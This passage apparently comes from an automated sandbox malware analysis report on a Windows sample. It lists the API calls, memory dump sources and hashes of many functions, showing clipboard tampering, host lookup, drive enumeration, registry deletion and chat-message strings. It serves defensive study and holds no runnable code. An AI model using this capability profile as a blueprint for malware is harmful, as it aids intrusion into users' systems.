                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Clipboard$Global$CloseUnlock$AvailableDataFormatLockOpen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 912484346-0
                                                                                                                                                                                                                                                      • Opcode ID: eae13a3a5f8b141e93e72840e9433ecd6021eb0ab63837767615a28323a228f1
                                                                                                                                                                                                                                                      • Instruction ID: 04bd896ddc82a1b7a155466ec80384b02c07603a9800962e80aadade4199eafd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eae13a3a5f8b141e93e72840e9433ecd6021eb0ab63837767615a28323a228f1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AF0C2B1310301ABE7106F75AC4DBAB3BACAF54713F00043AF505E2153DFA5D8518A7A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 0041394C
                                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00413957
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413961
                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041396E
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00413977
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413982
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00413989
                                                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00413992
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlocklstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3563369359-0
                                                                                                                                                                                                                                                      • Opcode ID: d1bfc2bec72121191d5fdeca06325dad68d51be11a781bbeb7cc51d1b5ca18e6
                                                                                                                                                                                                                                                      • Instruction ID: 03cfffbadc2426e9481ae38d35fbcacdd2f81c373927c6d6a8f287d221c63894
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1bfc2bec72121191d5fdeca06325dad68d51be11a781bbeb7cc51d1b5ca18e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1E0C9B1645211EFDB222BA0AD0DBAA3A28FF05753F404464F90A91161CF754962CBBB
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040F4D5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040FA52
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • gethostname.WS2_32(?,00000080), ref: 0040FAA9
                                                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 0040FAB6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$CountSleepTickgethostbynamegethostname
                                                                                                                                                                                                                                                      • String ID: IP: $asdf
                                                                                                                                                                                                                                                      • API String ID: 452584736-2391607419
                                                                                                                                                                                                                                                      • Opcode ID: 675ad9c3315867715e073771c222b3fc62d84ebd2aaea0f34cbab47e72c131b5
                                                                                                                                                                                                                                                      • Instruction ID: ab9c753e390d52234ecca9495911783dd6aac38805f13ab3233c2d1990d96d36
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 675ad9c3315867715e073771c222b3fc62d84ebd2aaea0f34cbab47e72c131b5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF0228B2A00248ABDB31EBA4CC51BEB739DAB09304F440477F544B65C3D67C9E4D8B6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041F6ED
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041F6FE
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,0041EA98,?), ref: 0041F709
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041F722
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041F733
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,0041EA98,?), ref: 0041F73E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,0041EA98,?), ref: 0041F767
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4250438611-0
                                                                                                                                                                                                                                                      • Opcode ID: 161cf8bd128d5a51058f7d358cb650ecc025abff49970afb976e8031017e02e2
                                                                                                                                                                                                                                                      • Instruction ID: 37ab511a8c99d46af37373ac3a2a01bb89e66870ac199741f8ee6592e2accd50
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 161cf8bd128d5a51058f7d358cb650ecc025abff49970afb976e8031017e02e2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A215C74640B01CFD720DF69C980AA2B3E5AB04320714897FD5AA87790E738EC8BCB19
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420325
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 00420331
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420366
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 0042038A
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420393
                                                                                                                                                                                                                                                        • Part of subcall function 00420254: lstrcpyA.KERNEL32(?,?,?,?,76AF23A0), ref: 004202A6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTicklstrlen$Sleeplstrcpy
                                                                                                                                                                                                                                                      • String ID: CHATMESSAGE %s %s
                                                                                                                                                                                                                                                      • API String ID: 4099572657-2765123567
                                                                                                                                                                                                                                                      • Opcode ID: 2eaa1224318611654b2d5092452d4982a2b1450a721547f192b0d231ec6be95a
                                                                                                                                                                                                                                                      • Instruction ID: b7813128639269fd7a031518db9444faf9342c1ad553484321c0b2c6c1a34b36
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2eaa1224318611654b2d5092452d4982a2b1450a721547f192b0d231ec6be95a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87112772700218EFCF10AF65EC457997FA49F44304F5040BBEE04A7292CA7CDA158BAE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLogicalDriveStringsA.KERNEL32(000003FF,?), ref: 004069C0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 004069DA
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,:\System Volume Information), ref: 004069FC
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                        • Part of subcall function 00413F8E: GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00413FA3
                                                                                                                                                                                                                                                        • Part of subcall function 00413F8E: OpenProcessToken.ADVAPI32(00000000), ref: 00413FAA
                                                                                                                                                                                                                                                        • Part of subcall function 00413F8E: GetLastError.KERNEL32 ref: 00413FB4
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: Sleep.KERNEL32(?,76AF23A0,00000011), ref: 00406726
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: wsprintfA.USER32 ref: 00406741
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: FindFirstFileA.KERNEL32(?,?), ref: 00406754
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: wsprintfA.USER32 ref: 00406798
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: FindNextFileA.KERNEL32(00000000,00000010), ref: 00406820
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: FindClose.KERNEL32(00000000), ref: 00406830
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00406A33
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • :\System Volume Information, xrefs: 004069F0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFind$ProcessSleepwsprintf$AttributesCloseCurrentDriveErrorFirstLastLogicalNextOpenStringsTokenlstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: :\System Volume Information
                                                                                                                                                                                                                                                      • API String ID: 37162560-840427735
                                                                                                                                                                                                                                                      • Opcode ID: 5622b39cc6e52f87ce0823d298bcf23ef7ce75b917dd8e64b3bfb3e20339746b
                                                                                                                                                                                                                                                      • Instruction ID: 3a35d430a8b653277afed3024383a8c970a327806e4800319cf946ad7f90d972
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5622b39cc6e52f87ce0823d298bcf23ef7ce75b917dd8e64b3bfb3e20339746b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72012B719441695BDB20AB648C09FEA776C5B01301F8000A2A9C5B2181DA786BD68F59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0042185F
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00421892
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,76AF23A0), ref: 0042189E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,76AF23A0), ref: 004218B5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountSleepTick
                                                                                                                                                                                                                                                      • String ID: (9F
                                                                                                                                                                                                                                                      • API String ID: 2804873075-1478797141
                                                                                                                                                                                                                                                      • Opcode ID: 563e7cb43550c95dcfdcc4b756396648e8eae4d2fb5d0f5d49cce62bc54be093
                                                                                                                                                                                                                                                      • Instruction ID: 602608fe2a53e29e7fbdf509ec23d8455fc930f4c724492092ef177562ae7c18
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 563e7cb43550c95dcfdcc4b756396648e8eae4d2fb5d0f5d49cce62bc54be093
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38F05961B083A46FE3106760FC84B2F3B488B62369F444036FC88512A2D75A0924C27F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: EnterCriticalSection.KERNEL32(0044F7E0), ref: 00405B51
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetDesktopWindow.USER32 ref: 00405B68
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetWindowRect.USER32(00000000), ref: 00405B6F
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BCA
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BEB
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,?,00000000), ref: 00405C17
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegDeleteValueA.ADVAPI32(?,00000000), ref: 00405C37
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCloseKey.ADVAPI32(?), ref: 00405C40
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: lstrlenA.KERNEL32(?), ref: 00405C70
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405F9D
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8,00000001), ref: 00405FA8
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405FB6
                                                                                                                                                                                                                                                      • EnumWindows.USER32(Function_00005D79,00000000), ref: 00405FC1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000C8), ref: 00405FCC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Delete$CountSleepTickWindow$CloseCreateCriticalDesktopEnterEnumRectSectionValueWindowslstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 281037392-0
                                                                                                                                                                                                                                                      • Opcode ID: e9a861f1c01a10f7759c420cdd16f1389e7c25a702535cb354152567e22b7995
                                                                                                                                                                                                                                                      • Instruction ID: c11db00c360bf4b784d5b7d7eeec3b580e66b8c7e3f3393114e085b604093c77
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9a861f1c01a10f7759c420cdd16f1389e7c25a702535cb354152567e22b7995
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFF02720285A0A9BD52077A18D86F7F3614DB14B04F60003BB944B72C1AEBC5815C9BF
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • select.WS2_32(00000001,?,00000000,00000000,0000000A), ref: 004028AA
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 004028B8
                                                                                                                                                                                                                                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 004028C8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: recvselect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 741273618-0
                                                                                                                                                                                                                                                      • Opcode ID: 2bf16eb18f15f9793efcb658b2bf93130dfb73b698c7f8967fffbbe24132bffb
                                                                                                                                                                                                                                                      • Instruction ID: 6264d5f5ecc1a434d16aa4f42c559176d7df99e7aa0d17d9064e4bdaab47e883
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bf16eb18f15f9793efcb658b2bf93130dfb73b698c7f8967fffbbe24132bffb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F118E7690021CAFCB11DF95CC848DEB7BCEB4A310F0085AAE915E3240C2B49A858FA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,76AF23A0), ref: 004168B8
                                                                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,76AF23A0), ref: 004168DA
                                                                                                                                                                                                                                                      • inet_addr.WS2_32(000001D8), ref: 004168ED
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: Sleep.KERNEL32(0000012C,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C14
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C1D
                                                                                                                                                                                                                                                      Memory Dump Source
